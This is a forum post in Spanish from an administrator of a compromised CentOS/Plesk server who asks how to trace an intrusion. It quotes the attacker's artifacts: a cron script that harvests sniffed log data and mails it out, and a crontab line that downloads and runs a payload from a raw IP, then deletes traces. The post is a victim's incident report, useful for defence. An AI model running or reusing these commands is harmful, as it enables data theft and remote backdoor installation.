Actualmente estoy tratando de averiguar cómo se comprometió uno de nuestros servidores centos. Estábamos experimentando malware en nuestros sitios. Después de buscar finalmente encontré el malware inyectando en los sitios. Como sucedía al azar, era difícil de detectar. Seguí la ayuda de este artículo del blog:
Esto me llevó a buscar a través de cada uno de los módulos de apache y, finalmente, encontró un módulo que estaba inyectando el malware. Fue bajo el nombre de mod_string_mime.so y se cargó a través de /etc/httpd/conf.d/mailman.conf para evitar la detección. Muy frustrante. Por lo tanto, el módulo ahora se elimina y el archivo mailman.conf vuelve a la normalidad.
Excavando más, instalé y ejecuté rkhunter. Al ejecutar esto, encontré una advertencia para un archivo sospechoso en /etc/cron.daily/ llamado dnsquery. En este archivo, esto es lo que parece ...
#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail [email protected] -s "$(hostname -f)" < test
mail [email protected] -s "$(hostname -f)" < test
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
He intentado eliminar este archivo pero sigue regresando cada minuto. El propietario y el grupo es 'psaadm'. No puedo encontrar cómo se está creando. Supongo que se está generando a través de plesk cron o algo así.
También encontré esto en el crontab:
* * * * * chattr -AacDdijsSu /bin/; cd /root ; wget http://77.241.87.75/xpsa/skdet.tgz; chmod +x skdet.tgz; tar zxvf skdet.tgz ; cd skdet ; ./inst; rm -rf /usr/share/misc /root/sk* /tmp/nc* /root/ssh/;
que no se ve bien.
¿Alguna sugerencia sobre cómo proceder o localizar la intrusión?